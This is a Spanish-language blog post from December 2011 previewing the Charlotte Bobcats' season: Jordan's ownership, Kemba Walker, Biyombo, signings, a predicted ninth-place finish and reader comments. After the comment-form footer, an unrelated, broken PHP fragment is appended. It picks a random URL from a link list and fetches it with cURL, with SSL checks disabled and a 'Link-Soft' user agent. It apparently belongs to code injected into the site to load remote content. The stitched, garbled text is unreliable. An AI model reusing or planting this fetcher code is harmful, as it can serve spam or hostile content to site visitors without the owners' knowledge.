Charlotte Bobcats: All-in por Kemba Walker

26 de December de 2011 por Sancho88

Charlotte fue en 2004 la cuadratura del círculo, la pieza que redondeó la cifra de 30 franquicias, la última en llegar si exceptuamos el viaje de los Supersonics de Seattle a Oklahoma City en 2008. La NBA desintegró su antigua separación de franquicias en 4 divisiones para ampliarlas a 6. Michael Jordan revitalizó el amor por la canasta en una ciudad que se dejó perder en 2002, que vendió a los Hornets de toda la vida, a los ‘abejorros’, destino a Nueva Orleans. Pocos años después, volvieron a tener baloncesto. Esta vez sería el equipo de los ‘linces rojos’ –traducción al castellano de los Bobcats–, los que poblaran la cancha del Charlotte Coliseum en Carolina del Norte, antigua casa de los Hornets.

Parecían prometer el oro y el moro, una nueva forma de hacer baloncesto. En las primeras temporadas todos querían saber quiénes eran aquellos descarados y jovenzuelos Gerald Wallace, Emeka Okafor, Raymond Felton y Sean May (más tarde se incorporarían Jason Richardson y el ‘prometedor’ Adam Morrison). Todos esperaban ver un dechado de virtudes, un show bajo el amparo de la leyenda del ‘23’. Pero pronto se confirmó que todo aquello era solo fuego de artificio, nada que ver con el juego vistoso de un equipo joven. En 2008 Jordan unió su destino a una leyenda de la canasta como Larry Brown, prestigioso miembro del restringido club de las 1.000 victorias como entrenador NBA, y en ese momento ya sabía que estaba condenando sus millones a un baloncesto rácano, a una involución del vistoso juego que sí ofrecieron sus Sixers de Iverson. Ni siquiera se podría decir que Charlotte haya desarrollo durante estos años un baloncesto ‘a la europea’, con su jerarquía de sistemas, su director sobrio, sus largas posesiones, etc. Simplemente, ofrecen su futuro al músculo y al poder de la defensa año tras año. Su máximo logro fue caer en primera ronda de 2010 contra los Magic, después de conseguir su primer record positivo como franquicia (44-38), espoleados por el buen hacer de Stephen Jackson y Gerald Wallace.

A pesar que el año pasado comenzaron un nuevo periplo en la liga tras la marcha de Larry Brown, Charlotte Bobcats no levanta aún demasiadas pasiones entre el aficionado medio. Más allá de la gran novedad esta temporada de Kemba Walker, mediáticamente el equipo suele ser más veces noticia por las declaraciones de ‘Su Majestad’ que por su juego en la cancha. En mayo de 2010 la junta directiva nombró a Michael Jordan como dueño mayoritario de la franquicia, sustituyendo en el cargo a Robert Johnson, comprador de la nueva plaza en la competición allá por 2003, ycomo cabeza visible, ciertamente ha provocado más críticas que aplausos. Primero, criticó públicamente a Lebron James tras su decisión de embarcarse en el proyecto de los Heat, diciendo que él jamás habría llamado a ‘Magic’ Johnson y a Larry Bird para formar un equipo, y este verano se erigió como ‘cabecilla’ del núcleo duro de los propietarios, pregonando las cláusulas más duras para los jugadores. Previamente, la NBA le multó con 100 mil dólares por hablar del ‘lockout’ desde su posición de propietario. No es que su imagen pública quede dañada después de este tipo de incidentes, es más, su fuerte carácter incluso le da lógica a sus actos, pero es cierto que el jugador mítico por excelencia de este deporte no es un romántico dentro de los despachos (como tampoco lo fue dentro de las canchas, desde luego).

En diciembre de 2010 Paul Silas cogió las riendas del equipo. A pesar de ser la mano derecha del viejo Larry desde 2008, su sucesión sorprendió en cuanto a concepción de juego, abandonando un poco el arcaico juego que imponía Brown y permitiendo la liberación de sus jugadores. De esa forma, algunos jugadores como DJ Augustine y Gerald Henderson descubrieron el talento que llevaban dentro. No obstante, volvieron a fracasar como equipo, consiguiendo un record muy mediocre (34-48).

La nueva temporada debe marcar otros derroteros para Charlotte. No dan demasiadas pistas con un roster repleto de medianías, pero la experiencia de algunos jugadores como Boris Diaw y Corey Magette, más este nuevo talento neoyorquino con etiqueta ‘Huskie’ y campeón universitario llamado Kemba Walker, hacen pensar en los Bobcats como uno de los candidatos a entrar en unos playoffs del Este más duros que nunca. Al menos, deberían estar en las apuestas entre el décimo y octavo y, dependiendo de si la promesa se convierte en hombre, entrar descaradamente en postemporada. Seguramente, Kemba Walker sea el jugador que más inquietudes haya creado en la corta historia de los Bobcats. Más allá del ‘patinazo’ histórico del señor Adam Morrison en 2006, el equipo estaba pidiendo como el comer un jugador mediático, de los que te venden camisetas y te llenan el pabellón. No es un top 10 dentro de la liga. Me atrevería a decir que ni un top 25. Simplemente, es alguien distinto. Su novena posición en el draft parece un pequeño gran robo –aunque muchas previsiones le colocaban incluso por debajo–, y su comparación con otros talentos de su hornada como Kyle Irving, Brandon Knight o Ricky Rubio quizá le sitúan a la sombra de los futuros jugadores llamados a dominar la liga. Pero Kemba Walker sabe que todo eso es solo mercadotecnia. No es ninguna locura pensar en él como el sucesor de Allen Iverson. Su rapidez y ligereza le sitúan en la línea de salida de una carrera deportiva que pude ser mayúscula, y su eficiencia en tiros de campo al menos no le deja desnudo frente a uno de los mejores bases-escoltas de todos los tiempos. Kemba es un jugador original, eléctrico, un talento puro encerrado en apenas 183 centímetros de altura y con muchas ganas de explosionar. A veces parece que flota sobre el parquet, juega con una armonía de movimientos impactante y tiene alma de ‘killer’.

Pero no será suficiente en una Conferencia Este cada vez más peligrosa. Como decimos, el equipo rotará en torno a Walker y a la veteranía de dos aleros como Maggette y Diaw, que además cuentan con los contratos más suculentos de la plantilla, en torno a 10 millones de dólares. En ese aspecto Jordan ha ‘cuadrado’ perfectamente las cuentas, con una plantilla que cobrará el tope del límite salarial: 57 millones. A ellos debemos sumarles esos dos jugadores que la pasada temporada dieron un paso al frente: Augustine y Henderson, para conformar un juego exterior realmente atractivo, y a la gran incógnita, no solo de este equipo, sino probablemente de toda la liga: Bismarck Biyombo. El congoleño, elegido por los Kings en el puesto número 7 del draft y traspasado inmediatamente a los Bobcats, puede ser el nuevo Serge Ibaka de la NBA. Ya demostró en los últimos compases de la pasada temporada andar sobrado de poderío físico, defensa e intimidación en Fuenlabrada. A pesar de no llegar a los 7 pies (2,06), el joven jugador de 19 años posee una envergadura poderosa que le debe aupar como uno de los jugadores ‘top’ en defensa de la liga, lo que le hace un jugador ideal para la filosofía de Paul Silas. Eso sí, su turbulenta salida de Fuenlabrada pondrá a prueba su madurez como persona, lo que puede ser un hándicap en la alocada temporada que nos espera.

Por lo demás, la salida este verano hacia Milwaukee de Shaun Livingston y Stephen Jackson, probablemente buscando su último gran contrato como profesional, a cambio de Corey Maggette, además del traspaso que llevó a Gerald Wallace la pasada campaña hacia Portland, a cambio de Dante Cunningham (ahora agente libre rumbo a Memphis) han sido cubiertos con dos jugadores de perfil más bajo pero con presente y futuro en la competición, como son Reggie Williams y Derrick Brown. Del primero poco vamos a descubrir en los Bobcats. Un tirador consumado en los Warriors, que a sus 25 años ha vivido las dos caras opuestas del baloncesto: la alegría de Don Nelson y el baloncesto espartano del ‘Sargento de Hierro’ Dusko Ivanovic. El resultado de Reggie resulta nefasto, por lo menos hacia un lado de la balanza, así que Silas debe cambiar definitivamente su estilo como entrenador, o ver al 50% de su capacidad a su nueva incorporación. Por un quiste en la rodilla podría perderse los primeros partidos. De Derrick Brown podríamos decir que no será titular, en principio, en su vuelta a Charlotte desde los Knicks.

Otro veterano como Tyrus Thomas peleará con él por el puesto de alero defensor desde el banquillo. Saltarín, reboteador, taponador y espectacular a partes iguales. Derrick Brown parece un calco de Thomas. Se complementarán bien en esa posición y nos dejarán jugadas para los rankings de la jornada. Si el juego exterior parece equilibrado, la dirección cubierta con Augustine, Walker y Ben Uzoh (a ver qué aporta en su temporada ‘sophomore’ tras su salida de New Jersey), el juego interior presenta muchas más incertidumbres. Es ahí sin duda alguna donde más problemas va a tener Silas. De ala-pívot puede poner a Thomas, como también puede colocar ahí a Diaw. El problema es que ninguno de ellos puede defender con garantías a colosos de la talla de Chris Bosh, Blake Griffin, Pau Gasol y un largo etcétera. Seguramente, opte por colocar a Biyombo en ese puesto, a pesar de que en Europa siempre ha sido pívot. Tiene buena mano y puede defender a gente mucho más grande.

Como ‘5’, de momento Silas apostará por dos jugadores muy del estilo bobcat: Desagana Diop y DJ White, que llega desde Oklahoma. Los precedentes ‘Larrybrownianos’ indican que Nazr Mohammed era aquel mesías en la zona, y los hijos sucesores del imperio podrían ser White y Diop, socios preferentes del club de ‘Ghepetto Brothers’, con Byron Mullens postulando también su candidatura al puesto (también procedente de Oklahoma). Los dos primeros tienen en la frente un cartel que pone prohibido tirar. Al menos Mullens puede anotar con más frecuencia, pero su perfil es parecido. En definitiva, si Biyombo no desmuestra lo que realmente vale, igual acaban echando de menos a Kwame Brown en Charlotte…

Por último, los Bobcats cuenta entre sus filas con un histórico que llegó a la franquicia allá por 2004, Matt Carroll. Tras su aventura fallida en Dallas Carroll vuelve a Charlotte a aportar sabiduría, experiencia y acierto.

Este es el panorama de los Charlotte Bobcats de Michael Jordan. En principio, nadie les dará opciones viendo como está el Este. Indiana, Philadelphia o Washington parten con más opciones de ocupar los últimos puestos de playoffs, pero la defensa aguerrida la tienen aprendida por concepto, y si aparece el talento de Kemba Walker y Maggette decide seguir demostrando en el Este todas sus cualidades –que son muchas– ojito con estos Bobcats.

Quinteto: Kemba Walker, Gerald Henderson, Corey Maggette, Boris Diaw, Bismarck Biyombo.
6º hombre: DJ Augustine/Reggie Williams.

Altas: Corey Maggette (Milwaukee Bucks), Derrick Brown (New York Knicks), Kemba Walker (R- Uconn Huskies), Ben Uzoh (New Jersey Nets), Bismarck Biyombo (R-Baloncesto Fuenlabrada), BJ Mullens (Oklahoma City Thunder), Reggie Williams (Golden State Warriors).

Bajas: Garret Temple (Novipiù Casale/Italia), Kwame Brown (Golden State Warriors), Stephen Jackson (Milwaukee Bucks), Shaun Livingston (Milwaukee Bucks).

Previsión: 9º de la Conferencia Este. Fuera de ‘playoffs’.

Comenta

10 comentarios a esta entrada

  1. melo15 dice:
    #1

    A mi estos bobcats me gustan mucho pero yo creo que han malvendido a wallace y a jackson

      Citar

  2. Denise dice:
    #2

    Buen analisis.

    Yo tambien creo que malvendieron a Gerald Wallace. La verdad es que Jordan o su GM no han atinado mucho en todas sus decisiones, y algunas de sus apuestas como Adam Morrison no dieron ningun resultado.
    Mis principales intereses por ver a los Bobcats son los rookies. Kemba puede darles un salto de calidad, sin embargo soy esceptico con Biyombo a corto plazo. Creo que pasaran un par de años hasta que este chico empiece a hacer partidazos. Y me sorprenderia que se mantuviese la temporada como titular.

      Citar

  3. melo15 dice:
    #3

    Bueno pero lo de morrison, jordan no tiene la culpa, morrison promediaba 20 puntos 10 rebotes en a uni yo tambien lo habria escogido

      Citar

  4. Txusma dice:
    #4

    Yo recuerdo en una liga fantástica que cambie a Carmelo por Morrison, no digo más… 😀

      Citar

  5. Sancho88 dice:
    #5

    y yo que pensaba que mi pick 5 de primera ronda por webber en detroit era insuperable… me consuela lo tuyo txus. xd

      Citar

  6. Esteban dice:
    #6

    bueno debo decir que no comparto para nada, para mi es uno de los peores equipos de la nba y peleara bien alto en el dracft,ni soñando PO

      Citar

  7. melo15 dice:
    #7

    Estoy contigo esteban

      Citar

  8. RSB dice:
    #8

    Creo que sois demasiado optimistas con vuestras predicciones. Ahora mismo veo a los Bobcats como una de las 3 peores plantillas de la NBA, veo más lógico que opten entre el puesto 12 y el 15 de la conferencia. No tienen anotación interior ni demasiados pesos pesados donde agarrarse, dependen de muchas incógnitas. El regalo de Wallace fue sonado, solo lo de Odom parece estar a la altura en los últimos tiempos. Equipo interesante de ver cómo evoluciona, pero que seguramente acabe peleando por nuevas primeras posiciones del draft para seguir la reconstrucción.

      Citar

  9. Sancho88 dice:
    #9

    El tiempo dará o quitará razones. Nada más

      Citar

  10. Esteban dice:
    #10

    bueno los bobcats acaban de ganar su primer partido, frente a los bucks, quien dice q tenga q tragarme mis palabras, pero igualmente sigo sosteniendo que no tienen para ser una revelacion, sus mejores jugadores juegan en los mismos puestos y su juego interior creo que por lejos es el peor de la liga, con permiso de toronto

    menudo partido de humpries, se me hace que sera all´star este año

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>